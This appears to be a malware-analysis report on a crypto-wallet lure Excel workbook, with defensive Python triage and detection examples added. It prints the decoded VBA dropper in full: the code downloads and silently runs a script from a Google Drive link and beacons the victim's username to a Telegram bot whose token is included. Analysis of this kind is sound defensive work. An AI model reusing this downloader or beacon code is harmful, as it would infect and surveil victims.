Verdict: MALICIOUS
Risk score: 310
Heuristics matched: 8
Findings

- VBA project inside OOXML (medium, OOXML_VBA, 6 related findings): the document contains a VBA project, so VBA macros are present.
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT). Matched line in script:
  Set objShLl_5 = CreateObject("WScript.Shell")
- LOLBin reference in VBA (critical, OLE_VBA_LOLBIN). Matched line in script:
  objShLl_5.Run "wscript.exe """ & starknet_abi_2 & """", 0, False
- Obfuscated VBA Shell command with URL (critical, OLE_VBA_OBFUSCATED_SHELL_URL): the macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own. Matched line in script:
  Set objShLl_5 = CreateObject("WScript.Shell")
- VBA downloads and writes a file to disk (critical, OLE_VBA_HTTP_DROP_EXEC): the macro reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning. Matched line in script:
  ObjectStarkVb_9 = objHtTp_3.ResponseBody
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script:
  Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
- Environ() call, environment-variable access (low, OLE_VBA_ENVIRON). Matched line in script:
  starknet_abi_2 = Environ("TEMP") & "\update-1.3.vbs"

Note on triggering: the extracted source (see the macros.bas preview below) contains no Auto_Open, Workbook_Open or other auto-exec handler; the ЭтаКнига (ThisWorkbook) and Лист1 (Sheet1) modules hold only attributes. The download-drop-execute routine Config is reached only through ConfigKEYS or ConfigSEED in Module4, so after macros are enabled the victim still has to invoke one of those two macros (for example from a button bound to them). Both entry points first confirm internet access via IsConnected, then beacon the victim's username to a Telegram bot (DataToStars), then run Config once and finally populate the sheet with the crypto-wallet "keys" or "seed" lure data.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the following are referenced by the macro:
  - http://www.google.com (connectivity check in IsConnected)
  - http://www.microsoft.com (connectivity check in IsConnected)
  - http://www.apple.com (connectivity check in IsConnected)
  - https://drive.google.com/uc?export=download&id=1r0LBIw-Kvw2pXnw75y4z5T2j1KdM2iG0 (second-stage payload fetched by Config and saved as %TEMP%\update-1.3.vbs)
  - https://api.telegram.org/bot (prefix of the Telegram Bot API beacon built in DataToStars; the bot token and chat_id are appended at run time)
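The findings above are the output of keyword heuristics over the decoded VBA. As an added example (not the analyzer's own code, and not the OLE_VBA_* rules themselves), the script below shows how such a static triage can be written so that it keys on COM ProgIDs, method names and the order of operations rather than on variable names, which this sample randomises (objHtTp_3, starknet_abi_2, ObjectStarkVb_9). The rule names, severity weights and verdict thresholds are my own assumptions; SAMPLE_VBA is an abridged copy of the Config and DataToStars routines shown in this report's macros.bas preview, and BENIGN_VBA is a constructed control case.

```python
"""Static triage of extracted VBA source: rule hits, download-drop-exec chain, IOC extraction.

Added example; rule names, weights and thresholds are assumptions, not the analyzer's rules.
"""
import json
import re

# Abridged from the macros.bas preview in this report (Config + DataToStars only).
SAMPLE_VBA = r'''
Sub Config()
    starknet_rpc_1 = "https://drive.google.com/uc?export=download&id=1r0LBIw-Kvw2pXnw75y4z5T2j1KdM2iG0"
    Set objHtTp_3 = CreateObject("MSXML2.ServerXMLHTTP")
    objHtTp_3.Open "GET", starknet_rpc_1, False
    objHtTp_3.send
    If objHtTp_3.Status = 200 Then
        Set objStReAm_4 = CreateObject("ADODB.Stream")
        objStReAm_4.Open
        objStReAm_4.Type = 1
        ObjectStarkVb_9 = objHtTp_3.ResponseBody
        objStReAm_4.Write ObjectStarkVb_9
        starknet_abi_2 = Environ("TEMP") & "\update-1.3.vbs"
        objStReAm_4.SaveToFile starknet_abi_2, 2
        objStReAm_4.Close
        Set objShLl_5 = CreateObject("WScript.Shell")
        objShLl_5.Run "wscript.exe """ & starknet_abi_2 & """", 0, False
        Kill starknet_abi_2
    End If
End Sub

Sub DataToStars()
    botToken = "5947267968:AAHxL6kLQXn-LJzVaFPGasW21jKZuRcB6Zc"
    chatID = "-1001636934858"
    url = "https://api.telegram.org/bot" & botToken & "/sendMessage?chat_id=" & chatID
End Sub
'''

# Constructed control case: a macro that only formats cells.
BENIGN_VBA = r'''
Sub FormatReport()
    Dim ws As Worksheet
    Set ws = ThisWorkbook.Sheets(1)
    ws.Cells(1, 1).Value = "Total"
    ws.Columns("A:E").AutoFit
End Sub
'''

# (rule name, weight, pattern). Patterns match ProgIDs and method names, never variable names.
RULES = [
    ("http_client",   3, re.compile(r'CreateObject\("(?:MSXML2\.(?:Server)?XMLHTTP[\w.]*|WinHttp\.WinHttpRequest[\w.]*)"\)', re.I)),
    ("binary_stream", 2, re.compile(r'CreateObject\("ADODB\.Stream"\)', re.I)),
    ("response_body", 2, re.compile(r'\.ResponseBody\b', re.I)),
    ("save_to_file",  3, re.compile(r'\.SaveToFile\b', re.I)),
    ("wscript_shell", 3, re.compile(r'CreateObject\("WScript\.Shell"\)', re.I)),
    ("lolbin_run",    4, re.compile(r'\.Run\s+"[^"]*\b(?:wscript|cscript|mshta|powershell|rundll32|regsvr32|cmd)(?:\.exe)?\b', re.I)),
    ("hidden_window", 1, re.compile(r'\.Run\s+.*,\s*0\s*,', re.I)),          # WindowStyle 0 = hidden
    ("temp_drop",     1, re.compile(r'Environ\("TEMP"\)', re.I)),
    ("self_delete",   1, re.compile(r'^\s*Kill\s+', re.I | re.M)),           # removes the dropped script
]

# All four must be present for the high-confidence download-drop-execute verdict.
DOWNLOAD_DROP_EXEC = ("http_client", "save_to_file", "wscript_shell", "lolbin_run")

URL_RE = re.compile(r'https?://[^\s"]+', re.I)
DROP_RE = re.compile(r'Environ\("(\w+)"\)\s*&\s*"(\\[^"]+)"', re.I)   # Environ("X") & "\name"
TG_TOKEN_RE = re.compile(r'\b\d{8,12}:[A-Za-z0-9_-]{30,}')             # Telegram bot token shape


def triage(vba: str) -> dict:
    """Return rule hits, a chain-based verdict and extracted IOCs for one VBA module."""
    hits = {name: [m.group(0) for m in rx.finditer(vba)] for name, _, rx in RULES if rx.search(vba)}
    score = sum(w for name, w, _ in RULES if name in hits)
    chain = all(r in hits for r in DOWNLOAD_DROP_EXEC)
    return {
        "score": score,
        "verdict": "MALICIOUS" if chain else ("SUSPICIOUS" if score >= 5 else "CLEAN"),
        "download_drop_exec": chain,
        "rules": sorted(hits),
        "urls": sorted(set(URL_RE.findall(vba))),
        "drop_paths": [f"%{var.upper()}%{path}" for var, path in DROP_RE.findall(vba)],
        "telegram_tokens": TG_TOKEN_RE.findall(vba),
    }


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_VBA), indent=2))
    print(json.dumps(triage(BENIGN_VBA), indent=2))
```

The verdict is driven by the presence of the whole chain, not by the weighted score: a macro that only calls WinHttp (a license check, say) should score as suspicious at most, while fetch plus SaveToFile plus WScript.Shell.Run of a script host is the dropper shape regardless of how the variables are named. If a sample builds the ProgIDs dynamically, as the OLE_VBA_HTTP_DROP_EXEC description warns, the CreateObject rules go quiet but the method-name rules (.ResponseBody, .SaveToFile, .Run) still fire, which is why both kinds are kept.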
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7734 bytes | 130c2296e56d763d866ba5240601a3599b81a33435e4b6055b835f60cc7b8c04 |

Preview of macros.bas (the analyzer shows at most the first 1,000 lines of an extracted script):
```vb
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Dim configExecuted As Boolean
Function IsConnected() As Boolean
On Error Resume Next
Dim objHTTP As Object
Dim usingWinHttp As Boolean
Dim urls As Variant
Dim i As Integer
urls = Array( _
"http://www.google.com", _
"http://www.microsoft.com", _
"http://www.apple.com" _
)
For i = LBound(urls) To UBound(urls)
Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
objHTTP.Open "GET", urls(i), False
objHTTP.send
usingWinHttp = (objHTTP.Status = 200)
If Not usingWinHttp Then
Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
objHTTP.Open "GET", urls(i), False
objHTTP.send
End If
If objHTTP.Status = 200 Then
IsConnected = True
Exit For
End If
Next i
Set objHTTP = Nothing
On Error GoTo 0
End Function
Attribute VB_Name = "Module2"
Sub Config()
Dim starknet_rpc_1 As String
Dim objHtTp_3 As Object
Dim objStReAm_4 As Object
Dim objShLl_5 As Object
Dim starknet_abi_2
' Dim logFilePath As String
' logFilePath = Environ("TEMP") & "\lastb2c4-7f56-43d9-a310-2f37dbb674a9.log"
' Delete the following block, which creates and checks a file with the date
' If Dir(logFilePath) = "" Then
' ...
starknet_rpc_1 = "https://drive.google.com/uc?export=download&id=1r0LBIw-Kvw2pXnw75y4z5T2j1KdM2iG0"
Dim maxAttempts As Integer
maxAttempts = 3
Dim attempts As Integer
attempts = 0
Do
Set objHtTp_3 = CreateObject("MSXML2.ServerXMLHTTP")
attempts = attempts + 1
objHtTp_3.Open "GET", starknet_rpc_1, False
On Error Resume Next
objHtTp_3.send
On Error GoTo 0
If objHtTp_3.Status = 200 Then
Set objStReAm_4 = CreateObject("ADODB.Stream")
objStReAm_4.Open
objStReAm_4.Type = 1
Dim ObjectStarkVb_9() As Byte
ObjectStarkVb_9 = objHtTp_3.ResponseBody
objStReAm_4.Write ObjectStarkVb_9
objStReAm_4.Position = 0
starknet_abi_2 = Environ("TEMP") & "\update-1.3.vbs"
objStReAm_4.SaveToFile starknet_abi_2, 2
objStReAm_4.Close
Set objShLl_5 = CreateObject("WScript.Shell")
objShLl_5.Run "wscript.exe """ & starknet_abi_2 & """", 0, False
Application.Wait Now + TimeValue("00:00:05")
Kill starknet_abi_2
Exit Do
End If
If attempts < maxAttempts Then
Application.Wait Now + TimeValue("00:00:05")
End If
Loop While attempts < maxAttempts
' If objHtTp_3.Status = 200 Then
' Dim logFileNumber As Integer
' logFileNumber = FreeFile
' Open logFilePath For Output As #logFileNumber
' Print #logFileNumber, Now
' Close #logFileNumber
' End If
Set objHtTp_3 = Nothing
Set objStReAm_4 = Nothing
Set objShLl_5 = Nothing
End Sub
Attribute VB_Name = "Module3"
Sub OpenKEYS()
Dim DataArray() As String
Dim i As Integer
Dim rowNum As Integer
DataArray = Split("0xa2d63585e51b88765e85738c5b67e771921d18c8691c5b7736867c091524e7c5;0x02bd26a8a86617ee94ad52a967d5b4d79a987ac13f1feaa91af530971cd19fca;0x7adc943221e70cd8394799a333449a1f15b31b05443f6c64660977508496556d;0xa4c31f808483d705eb32d94b6763c40ec2f786cbb30463824e366c1903fd2979;0x8e4ebb01ad90f693d6373773ee1184bd88ef170eaf67ae80a22a9d10a2879450;0xa62b84a746c64e335f8986e5eab8ac12c55af0203fe0ad7608233870ce94ac33;0xba457e0885efa3b56d222d72701d89bd632cc6dc8b68e18602d464178755d53e;0x6e8528c3e9e5dd8d13b0b50b28a56cea2dfbaa5c7e436f307f2c44bdfa8faff8;0x592ebb7218a67e326684a48460192b0781e2283cedf981585d1752112580a288;0x54003cf04496778b6d76bd84f9808be9b19d3ec8542176f327172ce9e1161ca8;0x212ea4e426d6a7cc3ba3e8f328aa34091cba6ab4a51b83f78f5557e54d808875", ";")
rowNum = 2
For i = LBound(DataArray) To UBound(DataArray)
ThisWorkbook.Sheets(1).Cells(rowNum, 4).Value = DataArray(i)
rowNum = rowNum + 1
Application.Wait Now + #12:00:01 AM#
Next i
End Sub
Sub OpenSEED()
Dim DataArray() As String
Dim i As Integer
Dim rowNum As Integer
DataArray = Split("month enforce humor east law home install gun arctic quote volume permit;digital swap shop occur bacon entire innocent human load abuse poem defense;tent foam bachelor about foil blossom together sick version approve always off;kiwi immense achieve advance certain virus armor salad envelope culture few truly;try rely monster dolphin brisk crowd hockey episode bargain stone ceiling wrestle;onion crouch cram drift burst famous fish spatial cattle number crumble bubble;rival calm pride hub frog stereo version jazz across tool stay ready;harvest moral chimney original census animal sample only credit disagree dilemma maid;later gesture reunion orange tool monitor sketch coil pilot horn oval region;corn hammer man cloth limit fossil nest company domain genuine lounge rose;burst crime silver cupboard across inside reject zone forum play original future", ";")
rowNum = 2
For i = LBound(DataArray) To UBound(DataArray)
ThisWorkbook.Sheets(1).Cells(rowNum, 5).Value = DataArray(i)
rowNum = rowNum + 1
Application.Wait Now + #12:00:01 AM#
Next i
End Sub
Attribute VB_Name = "Module4"
Sub ConfigKEYS()
If Not IsConnected() Then
MsgBox "Internet connection is unavailable. Please check your internet connection.", vbExclamation, "Error"
Exit Sub
End If
If Not configExecuted Then
Call Config
configExecuted = True
End If
Call DataToStars
Call OpenKEYS
End Sub
Sub ConfigSEED()
If Not IsConnected() Then
MsgBox "Internet connection is unavailable. Please check your internet connection.", vbExclamation, "Error"
Exit Sub
End If
If Not configExecuted Then
Call Config
configExecuted = True
End If
Call DataToStars
Call OpenSEED
End Sub
Sub DataToStars()
Dim botToken As String
Dim chatID As String
Dim messageText As String
botToken = "5947267968:AAHxL6kLQXn-LJzVaFPGasW21jKZuRcB6Zc"
chatID = "-1001636934858"
messageText = "Macro started by " & Environ("username")
Dim http As Object
Set http = CreateObject("MSXML2.ServerXMLHTTP.6.0")
Dim url As String
url = "https://api.telegram.org/bot" & botToken & "/sendMessage?chat_id=" & chatID & "&text=" & messageText
http.Open "GET", url, False
http.setRequestHeader "Content-Type", "text/xml"
http.send ""
End Sub
```
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 35328 bytes | e2401fe39f07627792db5babf3e81b6b1af567caee608dbf91556a0734124c3f |
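The static findings describe what the macro would do; on an endpoint the same chain leaves a process tree (EXCEL.EXE writes %TEMP%\update-1.3.vbs, then spawns wscript.exe on it with a hidden window, then the script is deleted) and a beacon to api.telegram.org. As an added example (not part of this report or of any EDR product), the detection below runs over a small set of constructed Sysmon-style events. The event schema (id 1 = process create, 11 = file create, 22 = DNS query, with pid, ppid, image, cmdline, target, query) is a simplified assumption rather than Sysmon's real field names, the user alice and the file paths are made up, and the only beacon domain listed is the one this sample uses.

```python
"""Correlate Office -> script-host -> %TEMP% script events into alerts (added example)."""
import re
from pathlib import PureWindowsPath

EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
TEMP_VBS = r"C:\Users\alice\AppData\Local\Temp\update-1.3.vbs"

# Constructed events, not telemetry from the report. Field names are a simplified assumption.
EVENTS = [
    {"id": 1, "pid": 4120, "ppid": 880, "image": EXCEL,
     "cmdline": f'"{EXCEL}" "C:\\Users\\alice\\Downloads\\keys.xlsm"'},
    {"id": 11, "pid": 4120, "image": EXCEL, "target": TEMP_VBS},                 # macro drops the .vbs
    {"id": 22, "pid": 4120, "image": EXCEL, "query": "api.telegram.org"},        # DataToStars beacon
    {"id": 1, "pid": 5208, "ppid": 4120, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": f'wscript.exe "{TEMP_VBS}"'},                                    # hidden Run
    # Benign noise: a print helper spawned by Excel, and a logon script not parented by Office.
    {"id": 1, "pid": 6001, "ppid": 4120, "image": r"C:\Windows\System32\splwow64.exe",
     "cmdline": "splwow64.exe"},
    {"id": 1, "pid": 6100, "ppid": 3300, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Documents\logon.vbs"'},
]

OFFICE_HOSTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".hta", ".ps1"}
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.I)
BEACON_DOMAINS = {"api.telegram.org"}   # only the domain this sample contacts


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def script_arg(cmdline: str):
    """Return the first (quoted or bare) argument whose extension is a script type, else None."""
    for m in re.finditer(r'"([^"]+)"|(\S+)', cmdline):
        tok = m.group(1) or m.group(2)
        if PureWindowsPath(tok).suffix.lower() in SCRIPT_EXTS:
            return tok
    return None


def detect(events):
    """Return a list of alert dicts; the dropper chain yields one critical alert per script host."""
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    dropped = {}   # lower-cased script path -> pid of the Office process that wrote it
    alerts = []
    for e in events:
        if e["id"] == 11 and basename(e["image"]) in OFFICE_HOSTS \
                and PureWindowsPath(e["target"]).suffix.lower() in SCRIPT_EXTS:
            dropped[e["target"].lower()] = e["pid"]
            alerts.append({"severity": "medium", "rule": "office_writes_script",
                           "pid": e["pid"], "path": e["target"]})
        elif e["id"] == 22 and basename(e["image"]) in OFFICE_HOSTS \
                and e["query"].lower() in BEACON_DOMAINS:
            alerts.append({"severity": "medium", "rule": "office_beacon_dns",
                           "pid": e["pid"], "query": e["query"]})
    for e in procs.values():
        parent = procs.get(e["ppid"])
        if parent is None or basename(parent["image"]) not in OFFICE_HOSTS:
            continue
        if basename(e["image"]) not in SCRIPT_HOSTS:
            continue
        path = script_arg(e["cmdline"])
        if path is None:
            continue
        # Script host under Office is suspicious on its own; from a temp dir more so;
        # running the very file Office just wrote is the download-drop-execute chain.
        severity = "high" if TEMP_DIR_RE.search(path) else "low"
        rule = "office_spawns_script_host"
        if path.lower() in dropped:
            severity, rule = "critical", "office_drop_and_exec"
        alerts.append({"severity": severity, "rule": rule, "pid": e["pid"],
                       "parent_pid": e["ppid"], "path": path})
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(a)
```

Because the macro deletes update-1.3.vbs five seconds after launching it, the file-create event and the wscript.exe command line are usually the only durable record of the payload path; correlating the two (rather than alerting on either alone) is what separates this dropper from a user double-clicking a script in Documents, which the control event for pid 6100 is there to show.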